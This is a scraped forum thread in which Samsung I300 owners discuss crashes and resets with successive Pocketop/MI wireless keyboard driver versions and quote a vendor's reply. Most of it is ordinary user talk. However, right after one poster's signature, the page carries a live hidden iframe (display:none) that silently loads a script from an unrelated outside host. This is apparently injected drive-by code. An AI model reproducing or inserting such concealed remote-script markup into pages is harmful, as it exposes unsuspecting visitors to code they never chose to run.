+ Reply to Thread
    ~Kimberly

Compatible Pocketop Keyboard at long last?

Thought I would share.

I wrote:
    C'mon guys, throw us a bone!

There are several faithful Samsung I300 users out there salivating for a keyboard. Many of us from a chat board contacted you weeks ago regarding your keyboard and the I300 compatibility.

We were given the canned response of "initial testing looks good but further extensive testing will be done over the next few weeks....blah blah blah", and we were put on mailing lists for updates, which never came.

Many of us optimistic I300 users purchased the Pocketop with the hopes that your product would free us from a life of eternal graffiti writing. What we got was an unstable driver that would crash our I300's after only 10-15 minutes of continuous typing. We gambled, we lost, but we are still hoping for a compatible driver to be developed. Your newest driver offers a bit more stability but we still get unpredictable crashes.

Long story short, there is an entire group of I300 owners out there that are worth your attention. I end this litany the way it began....

THROW US A BONE.

Their response:
    Let me say, I do appreciate your humor and frustration. We're actually
    moving forward on this quite vigorously, but it takes time to obtain support
    from Samsung. They are a large company and don't maneuver as quickly as us.
    At the same time, coding for the display of the Samsung phone does cost us
    money and the i300 group just isn't that big yet, trust me. Nevertheless,
    you can rest assured that we want to liberate you from the stylus, it just
    takes time as we also need to assure that the proper sales channels are set
    up. How much time? Probably well into October, but maybe even sooner on
    our website.

Make sure your registered on our mailing list and we'll let you know.

Just out of curiosity, how big do you estimate the i300 group to be?
    There may be light at the end of the tunnel. But I fear that with all the new 3G smartphones surfacing, the I300 group will diminish and the project dropped.

Kimberly<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Don't shake my tree if you don't like my peaches!!!

Thanks Kim

Thanks for the effort on behalf of the Keyboard.
    I'm using V1.2 of the driver and it's dramaticaly more stable that the previous version.
    There will be a V1.3.
    The beauty of that keyboard is that it will ultimately work with any other Palm device I own.
    I did have one hard reset with the keyboard. (while doing heavy scrolling w/ Wordsmith)
    What has been your experience with the new driver???
    Thanks
    Eddie

wireless keyboard

I saw this keyboard in the Aug/Sept issu of "Handheld Computing." The keyboard is wireless and beams your keystrokes to the palm via the ir port

Check it out @.....www.mi-products.com....

Supposedly it could be used with most palm models, but the price is kinda steep.....$119.99

I workED at WorldCom, so I won't be buying it anytime soon..., but if anyone is feeling bold, write us a line about it.

~Kimberly

Re: Thanks Kim

Originally posted by EDDIE
    ...I did have one hard reset with the keyboard. (while doing heavy scrolling w/ Wordsmith)
    What has been your experience with the new driver???
    Unpredictable soft resets and one hard reset. This is a DEFINTE handicap to me because my Palm is backed up on my work computer so if a crash happens on the weekend it forces me to go into the office to re-sync.

My Hard reset came when I was using the keyboard to chat on AIM. My soft resets (just a couple) have come with continuous typing of 10 minutes or longer.

Before this new driver, I had deleted the old driver because the activate/de-activate dance was too much for me to keep beat with and it was driving me insane. That is the only really noticeable improvement I have seen with this new driver, so I am hoping that future upgrades will offer MORE stability.

Kimberly

Pocketop Keyboard Beta driver

http://www.cliesource.com/forums/sho...?threadid=3951
    Hi Kimberly,
    Above is a URL for a thread on a Cliesource.com discussion fourm where some members have been working with the very person who is in charge of writing the programming for the keyboard driver. At one point he had distributed a BETA version of the v1.2 software. (especially for Clie's) You may want to monitor that forum on occasion. It's located in the Accesories discussion fourm.
    I've found the new driver v1.2 to be dramatically more stable but the hard reset was disgusting. I think in my reading of postings that some Clie users said they had one or two hard resets AT THE BEGINNING OF THEIR USE of the driver and it worked well after that.???? Does that make any sense??? Anyway. I'm content that they're working on a v2.0 I'm going to grab the first I-330 at my local Best Buy. Also when I purchased Wordsmith it came with Wordcomplete which I've found slighlty helpful as it suggests complete words followed by a space after I've graffittied 3 letters.
    Please post any news ASAP
    Eddie

I noticed that the pocketop/MI wireless keyboard driver is up to version 1.6, has anyone been trying out all the new versions? I have downloaded 1.6 here at work, but my keyboard is at home so I can't test it yet. I have not really tried any of the versions since V1.1 so I dunno if somewhere along the line the compatiblity has improved. I did see that the flip screen thing is still not functional for us in V1.6.

Here is where I found the V1.6 driver:
    CLICK ME BABY!
    Last edited by JigSawMan; 10-17-2002 at 09:14 AM.

~Kimberly
    JigSawMan

I tried the newer version and ended up going back to the previous version (1.2). Be sure to keep a copy of the old driver on your PC.

With the new driver I experienced keyboard malfunction. I would be typing and all the sudden it would just stop typing, like the batteries in my keyboard needed to be changed . I tried changing batteries and it didn't help. Then I tried disabling and re-enabling the driver. It would type for a few characters, sometimes as much as 4 or 5 sentences, other times only a few characters, but inevitably it would stop typing.

Since I changed back to the old driver (1.2), I am not having any trouble other than the occasional soft reset.

Let me know of your experience.

Kimberly